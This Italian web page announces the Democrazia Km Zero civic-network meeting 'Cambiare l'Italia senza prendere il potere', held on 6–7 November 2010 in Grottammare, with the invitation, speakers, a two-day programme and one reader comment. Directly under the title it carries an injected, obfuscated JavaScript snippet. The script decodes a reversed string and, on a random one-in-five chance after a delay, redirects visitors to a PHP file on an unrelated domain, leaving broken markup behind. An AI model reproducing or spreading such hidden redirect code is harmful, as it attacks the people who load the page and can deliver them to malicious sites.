Cambiare l’Italia senza prendere il potere. 6 e 7 novembre a Grottammare (AP)

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/10/dmkmzero.png”>
Democrazia Km Zero

Democrazia Km Zero insieme a Luoghi Comuni,  Rete Marchigiana di Cittadinanza, vi invita all’iniziativa:

Cambiare l’Italia senza prendere il potere
Democrazia Km Zero – Atto Secondo: la rete
Pratiche, politiche e prospettive comuni per una ricostruzione dal basso

6 e 7 novembre 2010 | Sala Kursall, viale Colombo, Grottammare (Ascoli Piceno)

***

Carissime/i,

siamo in tanti ad associarci per resistere, nei  territori, alla cancellazione dei diritti, al consumo di suolo, ad una green economy malintesa, alla privatizzazione dei beni comuni (spiagge, acqua, paesaggio), alla distruzione della ruralità, alla precarizzazione della vita e del lavoro.

E’ molto, ma non basta.

Vorremmo non limitarci a contrastare decisioni prese, ma essere lievito di rigenerata democrazia, di nuove colleganze fra cittadinanza ed istituzioni.

Per questo, ad un anno dall’incontro delle Piagge, proponiamo di rivederci a Grottammare (AP) il 6 e 7 novembre per un weekend di lavoro, tutto dedicato a scambiarci esperienze, saperi, prospettive e soprattutto ad avviare strumenti ed azioni comuni (comunicazione, sito, campagne, mutua formazione, lessici, seminari, etc. ).

I tavoli  di lavoro si occuperanno di Pratiche, Politiche e Prospettive comuni della Democrazia Km Zero.

Introducono i lavori Pierluigi Sullo, giornalista; Alessandro Santoro, prete della Comunità delle Piagge di Firenze; Ornella De Zordo diperUnaltracittà, lista di cittadinanza di FirenzeChiara Spadaro del Presidio No Dal MolinClaudio Giorno dei Comitati No Tav;Massimo Rossi di Luoghi Comuni di Ascoli Piceno.

Producono materiali ed animano i tavoli di lavoro Maurizio De ZordoCristiano Lucchi di perUnaltracittà di Firenze; Carlo Brunelli eSergio Sinigaglia di Altre MarcheAnna Pizzo, giornalista; Sergio Labate, Università di Macerata; Andrea Morniroli dei Cantieri Sociali di NapoliPaolo Cacciari, giornalista; Olimpia GobbiAngela Mary Pazzi di Luoghi Comuni di Ascoli Piceno.

Saranno inoltre presenti per le reti nazionali: Marco BersaniForum italiano dei movimenti per l’acqua bene comuneDavide BiolghiniRete Economia SolidaleTonio dell’OlioLibera, Luigi MerliRete del Nuovo Municipio, Anna Picciolini, rete@sinistra.

Concludono: Mario Pezzella, docente Scuola Normale Superiore di Pisa e Guido Viale, economista e scrittore.

Informazioni
320/4395338 | 349/8329661 | www.luoghi-comuni.org
info@luoghi-comuni.orgolimpia.gobbi@libero.itangelapazzi@yahoo.it

***

Il programma

SABATO 6 NOVEMBRE

ore 10.15
Introduzione ai lavori: il senso e le finalità dell’incontro | Olimpia Gobbi, Luoghi Comuni di Ascoli Piceno

ore 10.30
Perché Democrazia Km Zero | Pierluigi Sullo, giornalista
Dalle Piagge a Grottammare | Alessandro Santoro, prete della Comunità delle Piagge di Firenze
Liste civiche o liste di cittadinanza? | Ornella de Zordo, consigliera comunale perUnaltracittà di Firenze
Le pratiche: che cosa impariamo dall’esperienza del coordinamento dei comitati di Vicenza | Chiara Spadaro, Presidio No Dal Molin
Le politiche: che cosa impariamo dall’esperienza della Val di Susa | Claudio Giorno, Comitati No Tav
Le prospettive comuni ed i possibili strumenti per il futuro | Massimo Rossi , Luoghi Comuni di Ascoli Piceno

Ore 13.30 – 15.00
Pausa pranzo

Ore 15.00 – 19.00
Tavoli di lavoro: le 3P: Pratiche, Politiche e Prospettive comuni
1) Pratiche : quali saperi abbiamo acquisito e possiamo scambiarci per dare visione, progetto, continuità ed efficacia alla partecipazione nei territori
2) Politiche: che cosa abbiamo imparato e come possiamo procedere per cambiare dal basso le istituzioni e lo scenario politico
3) Prospettive: quale coordinamento e quali strumenti comuni (reti, lessici, campagne)

Predisporranno materiali di lavoro ed animeranno i tavoli Maurizio De Zordo e Cristiano Lucchi di perUnaltracittà; Carlo Brunelli e Sergio Sinigaglia di Altre Marche; Anna Pizzo, giornalista, Sergio Labate, Università di Macerata; Andrea Morniroli dei Cantieri Sociali di Napoli; Paolo Cacciari giornalista, Angela Mary Pazzi di Luoghi Comuni di Ascoli Piceno.

DOMENICA, 7 NOVEMBRE

Ore 10.00
Le proposte dei tavoli di lavoro e l’apporto delle reti nazionali | Coordina Andrea Morniroli dei Cantieri Sociali di Napoli
Interagiscono con i risultati e le proposte dei Tavoli di lavoro relativamente alle possibile Pratiche, Politiche e Prospettive comuni: Marco Bersani, Forum italiano dei movimenti per l’acqua bene comune; Davide Biolghini Rete Economia Solidale, Tonio dell’Olio di Libera; Luigi Merli sindaco di Grottammare e Rete del Nuovo Municipio, Anna Picciolini, rete@sinistra

Ore 12.00
Conclusioni
Mario Pezzella, docente Scuola Normale Superiore di Pisa e Guido Viale, economista e scrittore

Ore 14.00
Fine dei lavori

0 Comments

  1. domeniko

    sarebbe bello poter vedere in streaming l’evento per chi non ha modo di esserci. E’ prevista una diretta web o comunque si potranno consultare video degli interventi?
    Grazie

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *